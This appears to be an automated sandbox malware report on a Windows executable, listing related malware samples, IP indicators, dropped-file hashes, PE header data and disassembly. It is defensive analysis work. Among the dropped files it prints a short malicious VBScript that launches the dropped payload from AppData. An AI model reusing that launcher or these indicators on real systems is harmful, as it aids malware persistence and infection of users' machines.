                                                                  https://protect.checkpoint.com/v2/r02/___https://url1251.popmenu.com/qxdhqnhp?zus=z556.WRHPCjsgt/tA51B6LI9w4BubTYwM5p/-7KrggkVEpmPU5/oVFKKM8Rk6rAnqtQtILc2Q2H_3u9DiXC41Sfynx8MyN*~*gGwOol/aO3BY*~*pgD37kbc4-7KGmCSO4DHGqcB*~*D2S053knP-7G*~*y37ScDgrX/lhFDF7r7h5Gwz-7GtvZLu*~*h33zX5RXwSF0oDJX34CSZAvVXm4AFQJ-7Gq-7KxI/mcm4qvQmbxushMLQI9uHWfHKaPI5mifSCu5iVBRcvqUxu7JB4CzzH*~*tp7hI*~*P2JxcRqKbjQDa1m4EV2vJju-7KXGYhKkA/NMg4b3nlprWADF7NLfLtJTf5xKVlxz1PBE*~*XIwKJANjSZxzJHsTEzwI07xTpBPmh9cjRp3bNxF-8I___.YzJlOm1zbm90aWZ5OmM6bzphNDQ0NjUwYTgwNjk4YzE1YzQzODY0NjgzZWZkNGFjNzo3Ojk1N2U6NjEyMTFiMTNiOTljZDFhYmUzOWRiNzM5NDE0NGE3NDNhMDJkZjlhMmI1NzgzMzhlZTAwMjhmZTBkODVlNWNmZDpoOlQ6VAGet hashmaliciousUnknownBrowse
                                                                  • 104.17.25.14
                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                  • 172.67.220.198
                                                                  https://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                  • 104.16.99.29
                                                                  https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                                  • 104.17.25.14
                                                                  ORACLE-BMC-31898USTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 158.101.44.242
                                                                  SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 193.122.6.168
                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 158.101.44.242
                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 147.154.242.4
                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                  • 193.122.130.0
                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 140.204.52.53
                                                                  77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 158.101.44.242
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  54328bd36c14bd82ddaa0c04b25ed9adCITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.67.152
                                                                  PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 104.21.67.152
                                                                  SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.21.67.152
                                                                  Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.21.67.152
                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.67.152
                                                                  file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.67.152
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):143378
                                                                  Entropy (8bit):2.9942426555066564
                                                                  Encrypted:false
                                                                  SSDEEP:96:AIXLr4g+F05BhNfCs0FlRZpA6brTSBGcuZ9Izy2ul3mrWVjjrqnBaAJZdjureb3T:H3fjERRoGcuZ9Izy2ul3mrWVjqnBaA
                                                                  MD5:BB9AFA8306A3BEF21CCEAE432685104B
                                                                  SHA1:686FFC5186048A100BCDB54D281E4339FC1F3AF6
                                                                  SHA-256:E6D1C6C0670080395027B4BA5B68C13951E10778E392764997F6FAEB0B809DA0
                                                                  SHA-512:11F4B3AE1EC345A8150295CF054BB13950E61B64D4A92280258FBA8634FE854FFF1872E6B6EC4D00CBD139250FBB3C3BC0ED532A5D0CF19790C254C5C100C9E5
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9
                                                                  Process:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):204310
                                                                  Entropy (8bit):7.980521466831075
                                                                  Encrypted:false
                                                                  SSDEEP:6144:29PBUTRtFpu35kLXekPIVYfuZTCAqUe4bWNO5ybt:EQZpUGSIKYGsd4Ck5yB
                                                                  MD5:F420D0695FCA9AF6CA2C0EBE8F9EA03B
                                                                  SHA1:EE58808A3F2D7EE2FF0EC3862E4B0AB3F3AD4831
                                                                  SHA-256:6C06868290011943337AF92F477B677C781F9DC1E8A1657DCAE5C757E1264FEF
                                                                  SHA-512:DE91F1FD284DE316C160CE3EE050212FB695850FD13D236AC7EE8EC5E62BBA813112DC9E065E5B5DDA16310F7731A5908821970CB585046643EA519E47053CBF
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:EA06..0...4....H.M..}...C..j.z..5.U@.J`..M..tp.\...~....H.z.s.m....U.?K\^_,.].IMJE4.^er...q9..$.y..su..".H..%......g.T.v..]g:jE.M...Z...*.^h..\...Ge;.Vw...d..\..[.Rh.9..+1...........(..\.yR..'..0.G..u9`..j.G..j....!P..^.J.Q..J.Vm.T*.Z...b....P...G.?.5.Ep.T..iT`.L..?5'.NiTz=.]l...Z.VcY.S&...G..@..E.&..W..@.Y......T>.W.E......Y..+t.`...*..P...H......M.U&.i(.....&......1..,TI..sX..%............."]..........z..#.T*t....F../t9T.^.*Ef...KW..d....f.Q.E.h0.?..+...s 7...qF.t4^.."...U..e..E....x.*.U..)...S7.....Ng7..nd.O-...R*W B..E..:.mv._..ep..O..n..p.Omt...v/..?..~.4.-.uU..i...v...m.u....P06.U^........o..U.3....d.Z...k).^j...'O..c.t.G.+T... nE"...........i..1..U......y:._.Ss.....v}...s.H.;..Y.Z..).....E....Bc..E.....e "%..&......e..|{5J.ViF.y..,=/?..j)..T...gj...*%..g....gaR..x...T...]<.F=...S..? ....i6.Je..=..O..m..=..T.q{u..g.4.Ik.*_..g....J.S...s....].nx[.(..Dh....o....1..'.K..j...+...r..........J,....w.K..5...k.~m....c...W&...\d.o.V
                                                                  Process:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14654
                                                                  Entropy (8bit):7.627026730990899
                                                                  Encrypted:false
                                                                  SSDEEP:384:ITYznwyHtzwpHj13YvmbzMoHJOrK8elPfAvBYEVJSRgIf1:IAwyHtzwBj2mrHBlKBZMa8
                                                                  MD5:23F71F90FDACAF295124BC9396F383D1
                                                                  SHA1:C1D725B70E56390083C8294A8668F67BA7C5D636
                                                                  SHA-256:88A6C661CE71B7C69B8E6D03D6D3D7E2421733E6426DC863A743F2B8F7FF0F60
                                                                  SHA-512:9F934F03B9227DF67278CE29ECEF57B8EA704DE307B7773BEF10EBE7546F458E3D2F29054D0450B16C3AD7A383AF3320E3EDE388D5AA236263B660244BCC3FFA
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                                  Process:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):204310
                                                                  Entropy (8bit):7.980521466831075
                                                                  Encrypted:false
                                                                  SSDEEP:6144:29PBUTRtFpu35kLXekPIVYfuZTCAqUe4bWNO5ybt:EQZpUGSIKYGsd4Ck5yB
                                                                  MD5:F420D0695FCA9AF6CA2C0EBE8F9EA03B
                                                                  SHA1:EE58808A3F2D7EE2FF0EC3862E4B0AB3F3AD4831
                                                                  SHA-256:6C06868290011943337AF92F477B677C781F9DC1E8A1657DCAE5C757E1264FEF
                                                                  SHA-512:DE91F1FD284DE316C160CE3EE050212FB695850FD13D236AC7EE8EC5E62BBA813112DC9E065E5B5DDA16310F7731A5908821970CB585046643EA519E47053CBF
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:EA06..0...4....H.M..}...C..j.z..5.U@.J`..M..tp.\...~....H.z.s.m....U.?K\^_,.].IMJE4.^er...q9..$.y..su..".H..%......g.T.v..]g:jE.M...Z...*.^h..\...Ge;.Vw...d..\..[.Rh.9..+1...........(..\.yR..'..0.G..u9`..j.G..j....!P..^.J.Q..J.Vm.T*.Z...b....P...G.?.5.Ep.T..iT`.L..?5'.NiTz=.]l...Z.VcY.S&...G..@..E.&..W..@.Y......T>.W.E......Y..+t.`...*..P...H......M.U&.i(.....&......1..,TI..sX..%............."]..........z..#.T*t....F../t9T.^.*Ef...KW..d....f.Q.E.h0.?..+...s 7...qF.t4^.."...U..e..E....x.*.U..)...S7.....Ng7..nd.O-...R*W B..E..:.mv._..ep..O..n..p.Omt...v/..?..~.4.-.uU..i...v...m.u....P06.U^........o..U.3....d.Z...k).^j...'O..c.t.G.+T... nE"...........i..1..U......y:._.Ss.....v}...s.H.;..Y.Z..).....E....Bc..E.....e "%..&......e..|{5J.ViF.y..,=/?..j)..T...gj...*%..g....gaR..x...T...]<.F=...S..? ....i6.Je..=..O..m..=..T.q{u..g.4.Ik.*_..g....J.S...s....].nx[.(..Dh....o....1..'.K..j...+...r..........J,....w.K..5...k.~m....c...W&...\d.o.V
                                                                  Process:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14654
                                                                  Entropy (8bit):7.627026730990899
                                                                  Encrypted:false
                                                                  SSDEEP:384:ITYznwyHtzwpHj13YvmbzMoHJOrK8elPfAvBYEVJSRgIf1:IAwyHtzwBj2mrHBlKBZMa8
                                                                  MD5:23F71F90FDACAF295124BC9396F383D1
                                                                  SHA1:C1D725B70E56390083C8294A8668F67BA7C5D636
                                                                  SHA-256:88A6C661CE71B7C69B8E6D03D6D3D7E2421733E6426DC863A743F2B8F7FF0F60
                                                                  SHA-512:9F934F03B9227DF67278CE29ECEF57B8EA704DE307B7773BEF10EBE7546F458E3D2F29054D0450B16C3AD7A383AF3320E3EDE388D5AA236263B660244BCC3FFA
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                                  Process:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):204310
                                                                  Entropy (8bit):7.980521466831075
                                                                  Encrypted:false
                                                                  SSDEEP:6144:29PBUTRtFpu35kLXekPIVYfuZTCAqUe4bWNO5ybt:EQZpUGSIKYGsd4Ck5yB
                                                                  MD5:F420D0695FCA9AF6CA2C0EBE8F9EA03B
                                                                  SHA1:EE58808A3F2D7EE2FF0EC3862E4B0AB3F3AD4831
                                                                  SHA-256:6C06868290011943337AF92F477B677C781F9DC1E8A1657DCAE5C757E1264FEF
                                                                  SHA-512:DE91F1FD284DE316C160CE3EE050212FB695850FD13D236AC7EE8EC5E62BBA813112DC9E065E5B5DDA16310F7731A5908821970CB585046643EA519E47053CBF
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:EA06..0...4....H.M..}...C..j.z..5.U@.J`..M..tp.\...~....H.z.s.m....U.?K\^_,.].IMJE4.^er...q9..$.y..su..".H..%......g.T.v..]g:jE.M...Z...*.^h..\...Ge;.Vw...d..\..[.Rh.9..+1...........(..\.yR..'..0.G..u9`..j.G..j....!P..^.J.Q..J.Vm.T*.Z...b....P...G.?.5.Ep.T..iT`.L..?5'.NiTz=.]l...Z.VcY.S&...G..@..E.&..W..@.Y......T>.W.E......Y..+t.`...*..P...H......M.U&.i(.....&......1..,TI..sX..%............."]..........z..#.T*t....F../t9T.^.*Ef...KW..d....f.Q.E.h0.?..+...s 7...qF.t4^.."...U..e..E....x.*.U..)...S7.....Ng7..nd.O-...R*W B..E..:.mv._..ep..O..n..p.Omt...v/..?..~.4.-.uU..i...v...m.u....P06.U^........o..U.3....d.Z...k).^j...'O..c.t.G.+T... nE"...........i..1..U......y:._.Ss.....v}...s.H.;..Y.Z..).....E....Bc..E.....e "%..&......e..|{5J.ViF.y..,=/?..j)..T...gj...*%..g....gaR..x...T...]<.F=...S..? ....i6.Je..=..O..m..=..T.q{u..g.4.Ik.*_..g....J.S...s....].nx[.(..Dh....o....1..'.K..j...+...r..........J,....w.K..5...k.~m....c...W&...\d.o.V
                                                                  Process:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14654
                                                                  Entropy (8bit):7.627026730990899
                                                                  Encrypted:false
                                                                  SSDEEP:384:ITYznwyHtzwpHj13YvmbzMoHJOrK8elPfAvBYEVJSRgIf1:IAwyHtzwBj2mrHBlKBZMa8
                                                                  MD5:23F71F90FDACAF295124BC9396F383D1
                                                                  SHA1:C1D725B70E56390083C8294A8668F67BA7C5D636
                                                                  SHA-256:88A6C661CE71B7C69B8E6D03D6D3D7E2421733E6426DC863A743F2B8F7FF0F60
                                                                  SHA-512:9F934F03B9227DF67278CE29ECEF57B8EA704DE307B7773BEF10EBE7546F458E3D2F29054D0450B16C3AD7A383AF3320E3EDE388D5AA236263B660244BCC3FFA
                                                                  Malicious:false
                                                                  Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                                  Process:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):208896
                                                                  Entropy (8bit):7.844880601848825
                                                                  Encrypted:false
                                                                  SSDEEP:3072:i9O9jf0UmS/OR6QX3VI9L+40EZWYaolYjybauhLP8Kztz9js4cuaj+ct1c2tmjPq:x+S/ses40EZWjgYjMHVpz9YrR+ct62tP
                                                                  MD5:B1E24E004A4024F16913D4CEB6A21FA6
                                                                  SHA1:55E2E0834DAEA5FCC553256F1F7DF584D32EA63F
                                                                  SHA-256:40FCEE586FC0674B49A660F524D172415EED8B7EC2D2B6886E7E145BD6302159
                                                                  SHA-512:231D0F0DFC1A58725EED9885E8DD8DDDB01F33C106E4FF2D6BD3061EFFB05D638AFACDC836CD386686AADB0DF9EFA86AAB49E1A17405027027A7FF9A9DFE934F
                                                                  Malicious:false
                                                                  Preview:{..PV1YHH6XW..JC.EUWU6F5.U1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGE.WU6H*.[1.A...V..k./,&w%D)R"4\y+-X689.(&g7 9u_(...by%#R=y@4@gGEUWU6F]@..u9.Ht&.Gf2.;gt*HyD.+:..2.).3.;.9.$.+.e[.I@.6~.1).H.=uf.)xG.K.<R1d=.&WM9JCGEUWU6F5PU1....XWM9..GE.VQ62.P.1YHL6XWM.J`FNT^U6.4PU.XHL6XWb.JCGUUWU.G5PUqYH\6XWO9JFGEUWU6F0PU1YHL6X'N9JGGE.lW6D5P.1YXL6HWM9JSGEEWU6F5PE1YHL6XWM9JC.PWW.6F5P53Y.C7XWM9JCGEUWU6F5PU1YHL6XWM9..FEIWU6F5PU1YHL6XWM9JCGEUWU6F5P.<[H.6XWM9JCGEUWU.G5.T1YHL6XWM9JCGEUWU6F5PU1YHL6v#(A>CGEM.T6F%PU1.IL6\WM9JCGEUWU6F5Pu1Y(bD<69XJC.(UWU.G5P;1YH.7XWM9JCGEUWU6FuPUqw,-B9WM9.sGEUwW6F#PU1SJL6XWM9JCGEUWUvF5.{C*:/6XW.6KCG%WWU&G5Pu3YHL6XWM9JCGEU.U6.5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM9JCGEUWU6F5PU1YHL6XWM
                                                                  Process:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1112064
                                                                  Entropy (8bit):7.077904330186389
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Qu6J33O0c+JY5UZ+XC0kGso6FakwzhOgNe5YvTYWY:au0c++OCvkGs9FakQxKYvfY
                                                                  MD5:687AF4583057DD6924F0102DEF1B8F89
                                                                  SHA1:451232EFA9E8891D1C87C81B9E5BE3FB7E62E5B5
                                                                  SHA-256:CAAFF6D88CAFFF7AEF0CCC6BA09E9E15B54763B8EE85054EFF6D812EDC5302C6
                                                                  SHA-512:52879300C02AD259462A4840C45338EEBA5A31D73060BF7602B6D5B09E77BE3A98D6B611136E78FF48594ED96FFCE3D1E6A9E0683894980E6D54094C3C09F453
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 74%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Wg.........."..................}............@..........................`......-S....@...@.......@.....................L...|....p...o.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....o...p...p..................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):284
                                                                  Entropy (8bit):3.392822050419667
                                                                  Encrypted:false
                                                                  SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1SlpAHsrQlTlupRdnriIM8lfQVn:DsO+vNlzQ1swT0tmA2n
                                                                  MD5:CF1D51BC43E693B42D972CFA8010427C
                                                                  SHA1:26C4FBE3AB086D759DC88A5048663F6961757EE2
                                                                  SHA-256:78032F1EAFB296F3EB46D011AC507C534EB19D03FB0E16AF36A690F9D0C65C69
                                                                  SHA-512:D31CFFBA07E627373091669065AEFAA6218379BA263A56776E1BC8D5C02B57D0044C4DAE264D3642B607A9E653E90C4348BE050151E645C8EEF071B495411801
                                                                  Malicious:true
                                                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.j.u.v.e.n.i.l.e.\.n.o.n.p.l.a.c.e.n.t.a.l...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.077904330186389
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:ref_97024130865.exe
                                                                  File size:1'112'064 bytes
                                                                  MD5:687af4583057dd6924f0102def1b8f89
                                                                  SHA1:451232efa9e8891d1c87c81b9e5be3fb7e62e5b5
                                                                  SHA256:caaff6d88cafff7aef0ccc6ba09e9e15b54763b8ee85054eff6d812edc5302c6
                                                                  SHA512:52879300c02ad259462a4840c45338eeba5a31d73060bf7602b6d5b09e77be3a98d6b611136e78ff48594ed96ffce3d1e6a9e0683894980e6d54094c3c09f453
                                                                  SSDEEP:24576:Qu6J33O0c+JY5UZ+XC0kGso6FakwzhOgNe5YvTYWY:au0c++OCvkGs9FakQxKYvfY
                                                                  TLSH:5935CF2273DDC360CB769173BF6AB7016EBB7C210630B95B2F980D7DA950162162D7A3
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                  Icon Hash:aaf3e3e3938382a0
                                                                  Entrypoint:0x427dcd
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6757B009 [Tue Dec 10 03:05:45 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                  Instruction
                                                                  call 00007F1C30881B8Ah
                                                                  jmp 00007F1C30874954h
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [esp+10h]
                                                                  mov ecx, dword ptr [esp+14h]
                                                                  mov edi, dword ptr [esp+0Ch]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007F1C30874ADAh
                                                                  cmp edi, eax
                                                                  jc 00007F1C30874E3Eh
                                                                  bt dword ptr [004C31FCh], 01h
                                                                  jnc 00007F1C30874AD9h
                                                                  rep movsb
                                                                  jmp 00007F1C30874DECh
                                                                  cmp ecx, 00000080h
                                                                  jc 00007F1C30874CA4h
                                                                  mov eax, edi
                                                                  xor eax, esi
                                                                  test eax, 0000000Fh
                                                                  jne 00007F1C30874AE0h
                                                                  bt dword ptr [004BE324h], 01h
                                                                  jc 00007F1C30874FB0h
                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                  jnc 00007F1C30874C7Dh
                                                                  test edi, 00000003h
                                                                  jne 00007F1C30874C8Eh
                                                                  test esi, 00000003h
                                                                  jne 00007F1C30874C6Dh
                                                                  bt edi, 02h
                                                                  jnc 00007F1C30874ADFh
                                                                  mov eax, dword ptr [esi]
                                                                  sub ecx, 04h
                                                                  lea esi, dword ptr [esi+04h]
                                                                  mov dword ptr [edi], eax
                                                                  lea edi, dword ptr [edi+04h]
                                                                  bt edi, 03h
                                                                  jnc 00007F1C30874AE3h
                                                                  movq xmm1, qword ptr [esi]
                                                                  sub ecx, 08h
                                                                  lea esi, dword ptr [esi+08h]
                                                                  movq qword ptr [edi], xmm1
                                                                  lea edi, dword ptr [edi+08h]
                                                                  test esi, 00000007h
                                                                  je 00007F1C30874B35h
                                                                  bt esi, 03h
                                                                  jnc 00007F1C30874B88h
                                                                  Programming Language:
                                                                  • [ASM] VS2013 build 21005
                                                                  • [ C ] VS2013 build 21005
                                                                  • [C++] VS2013 build 21005
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                  • [RES] VS2013 build 21005
                                                                  • [LNK] VS2013 UPD4 build 31101
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
